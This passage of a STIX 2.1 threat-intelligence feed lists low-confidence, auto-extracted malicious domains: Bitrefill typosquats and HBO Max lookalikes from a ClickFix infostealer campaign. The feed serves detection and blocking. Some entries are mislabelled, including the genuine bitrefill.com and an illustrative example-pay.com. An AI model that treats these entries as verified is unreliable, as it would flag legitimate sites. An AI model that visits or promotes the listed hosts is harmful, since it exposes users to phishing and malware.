'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--661747c8-78a5-4f5c-9cb3-ce246fc7a119","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbomaxx.app","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: id . Of the 108 ads, 46 used an HBO Max lure, split between hbomaxx[.]app and hbomax-macos[.]com. Another 36 posed as OpenAI Codex,","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9abd2267-df48-4e3d-8cb5-c996eabb6b57","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbomaxx.us","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: HBO Max subreddits,” wrote the user. Clicking the ad led to hbomaxx[.]us, “which looks somewhat legitimate, and has a join button","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4faf53f6-03a9-4b74-b909-4bc05bf7277a","created":"2026-09-15T09:09:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbomaxx.us","description":"Seen in \"Hacked HBO Max Reddit Account Used for Malware Delivery via ClickFix Attack\" (SecurityWeek). Context: ich does not exist. Clicking the malicious ads led users to hbomaxx[.]us, a page mimicking the official HBO Max site that also con","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T09:09:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SecurityWeek","url":"https://www.securityweek.com/hacked-hbo-reddit-account-used-for-malware-delivery-via-clickfix-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5ea3b51c-d19a-4dd1-88ad-a8f5ace1597e","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: biterflll.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: y tips in seconds. Indicators of compromise (IOCs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com b","pattern":"[domain-name:value = 'biterflll.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1035bc02-f1bf-4f1d-986b-bd731fb0cd96","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bitigift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: s. Indicators of compromise (IOCs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.","pattern":"[domain-name:value = 'bitigift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5679d911-2634-44cc-a085-f68ab5479e02","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bitrefall.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: f compromise (IOCs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.","pattern":"[domain-name:value = 'bitrefall.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2e855f87-c0c0-458d-8cee-aaf25dfc6a01","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bitrefill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: ed or charged back. Confirm that the main domain is exactly bitrefill.com before approving a payment. Be wary of domains containing a","pattern":"[domain-name:value = 'bitrefill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3d7dfde0-1589-4a5c-ba06-eee237e43232","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bitrefill-payments.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: Cs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitr","pattern":"[domain-name:value = 'bitrefill-payments.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--203c8eca-3da5-4c9f-879e-39af9135eaf4","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bitrefill-pays.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[","pattern":"[domain-name:value = 'bitrefill-pays.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ef16d91e-bb92-4ec7-b54c-d08abbb16ae9","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bitregift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: trefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[","pattern":"[domain-name:value = 'bitregift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--511ed31f-de11-491b-ac98-30b8d1c1f489","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bitregill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: trefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[","pattern":"[domain-name:value = 'bitregill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b2d0c81e-b426-48e2-8ef2-49ffd08ad45e","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bitretill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: [.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[","pattern":"[domain-name:value = 'bitretill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4fee91a5-a2fc-4b54-b64a-48ff14671ffa","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bitrgift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: -pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill","pattern":"[domain-name:value = 'bitrgift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--efa30f9e-66df-4cc9-812b-e616b9b68af8","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bitrgifts.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: regift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitre","pattern":"[domain-name:value = 'bitrgifts.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c340487a-5371-4aa4-9e89-e229e8b30ce8","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bitrnfill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: regill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-b","pattern":"[domain-name:value = 'bitrnfill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c588803d-5f41-4fd7-b0f8-f24b4c1e1798","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bitruflli.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: retill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pa","pattern":"[domain-name:value = 'bitruflli.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6d64d4c3-48af-4d93-a56a-d9197f1330d0","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: butrefill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: rgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]co","pattern":"[domain-name:value = 'butrefill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d8c56775-7e56-4b85-8688-795e2bce6024","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: example-pay.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: y’s main domain, as in pay.example.com . An address such as example-pay.com is a completely separate domain that anyone could register.","pattern":"[domain-name:value = 'example-pay.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7773886a-7398-4900-97b3-a4826d49dcd7","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: pay-bitigift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefl","pattern":"[domain-name:value = 'pay-bitigift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c6455767-450e-4fcd-ba1d-6000063709b9","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: pay-bitregill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: gifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]co","pattern":"[domain-name:value = 'pay-bitregill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e4e5220c-f945-43b6-9337-c1a27b8b36f2","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: pay-bitrgift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: l[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]co","pattern":"[domain-name:value = 'pay-bitrgift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--718d1903-20ac-4aaa-b80e-1558ef63697b","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: pay-bitrgifts.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: ]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.","pattern":"[domain-name:value = 'pay-bitrgifts.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--41ad7780-9977-4dfa-8663-d81549fabbfd","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: pay-butrefill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2","pattern":"[domain-name:value = 'pay-butrefill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9a45b43a-feed-44f9-a5e8-60445ede9c21","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: xn--bitrefll-71a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bit","pattern":"[domain-name:value = 'xn--bitrefll-71a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f53eb224-b213-4db7-bdf7-0251c6da5284","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: xn--bitrefll-h2a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: y-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn-","pattern":"[domain-name:value = 'xn--bitrefll-h2a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--88354457-e0aa-4ff9-9b08-9d15435e7152","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: xn--bitrefll-pay-kfb.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: itigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bit","pattern":"[domain-name:value = 'xn--bitrefll-pay-kfb.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b00f51e6-598e-4d9e-a1b4-65f3d36813a2","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: xn--bitrefll-pay-xfb.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: 71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitrei","pattern":"[domain-name:value = 'xn--bitrefll-pay-xfb.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4a78a857-c79c-4054-8500-daf988ca92c0","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: xn--bitrefll-q2a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: .]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--b","pattern":"[domain-name:value = 'xn--bitrefll-q2a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a4bd0fa4-39df-4b15-aa5a-72aec22dc8b9","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: xn--bitreill-cz9c.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pa","pattern":"[domain-name:value = 'xn--bitreill-cz9c.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--78765b5f-1b6f-43cd-aa78-08df93ddbc1d","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: xn--bitreill-pay-yq4f.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: ay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pay-bitrefll-fgb[.]com Stop th","pattern":"[domain-name:value = 'xn--bitreill-pay-yq4f.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6f26d543-aba4-43a6-aa50-885088610771","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: xn--btrefill-l2a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pay-bitrefll-fgb[.]com Stop threats before they can d","pattern":"[domain-name:value = 'xn--btrefill-l2a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7a3a02c7-bf16-427f-adca-0be37bf8f109","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: xn--pay-bitrefll-fgb.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: 9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pay-bitrefll-fgb[.]com Stop threats before they can do any harm. Malwarebytes Br","pattern":"[domain-name:value = 'xn--pay-bitrefll-fgb.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d49e84c9-d6f8-4374-bf83-b062870410bf","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: aforvm.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domains Domain loop-lumen[.]com;","pattern":"[domain-name:value = 'aforvm.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1702541c-b002-48e5-afbf-dd6a512f924b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: aidevmaster.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumb","pattern":"[domain-name:value = 'aidevmaster.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 